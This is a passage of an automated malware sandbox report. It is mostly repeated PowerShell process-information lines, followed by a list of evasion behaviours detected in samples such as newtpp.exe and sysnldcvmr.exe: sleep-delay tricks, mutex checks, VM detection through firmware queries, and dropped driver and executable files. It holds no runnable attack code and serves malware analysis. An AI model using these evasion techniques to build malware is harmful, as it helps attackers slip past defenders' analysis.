                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Contains functionality to detect sleep reduction / modifications
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040CCF00_2_0040CCF0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_0040CCF01_2_0040CCF0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040CCF02_2_0040CCF0
                  Found evasive API chain (may stop execution after checking mutex)
                  Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4353
                  Source: C:\Users\user\Desktop\newtpp.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-4351
                  Source: C:\Users\user\Desktop\newtpp.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-4351
                  Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4353
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Windows\System32\dwm.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeMemory allocated: AA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeMemory allocated: 1B560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 900000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\sysnldcvmr.exeWindow / User API: threadDelayed 4922Jump to behavior
                  Source: C:\Windows\sysnldcvmr.exeWindow / User API: threadDelayed 1090Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7312
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2277
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7338
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2104
                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 9061
                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 939
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4703
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7595
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                  Source: C:\Users\user\Desktop\newtpp.exeEvaded block: after key decisiongraph_0-4353
                  Source: C:\Users\user\Desktop\newtpp.exeEvaded block: after key decisiongraph_0-4364
                  Source: C:\Windows\sysnldcvmr.exeEvaded block: after key decisiongraph_2-4351
                  Source: C:\Users\user\Desktop\newtpp.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-4368
                  Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_1-5754
                  Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4376
                  Source: C:\Users\user\Desktop\newtpp.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-5284
                  Source: C:\Users\user\Desktop\newtpp.exeAPI coverage: 3.9 %
                  Source: C:\Windows\sysnldcvmr.exeAPI coverage: 1.0 %
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_0040CCF02_2_0040CCF0
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_0040CCF00_2_0040CCF0
                  Source: C:\Windows\sysnldcvmr.exe TID: 3428Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\sysnldcvmr.exe TID: 1900Thread sleep count: 4922 > 30Jump to behavior
                  Source: C:\Windows\sysnldcvmr.exe TID: 1900Thread sleep time: -14766000s >= -30000sJump to behavior
                  Source: C:\Windows\sysnldcvmr.exe TID: 3428Thread sleep count: 1090 > 30Jump to behavior
                  Source: C:\Windows\sysnldcvmr.exe TID: 4632Thread sleep count: 337 > 30Jump to behavior
                  Source: C:\Windows\sysnldcvmr.exe TID: 4248Thread sleep time: -900000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exe TID: 2140Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exe TID: 7620Thread sleep time: -55000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 7312 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 2277 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 7338 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 2104 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep count: 4703 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\dwm.exe TID: 1508Thread sleep count: 73 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 7595 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 281 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_004066B0
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406570
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004066B0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406570
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004066B0
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406570
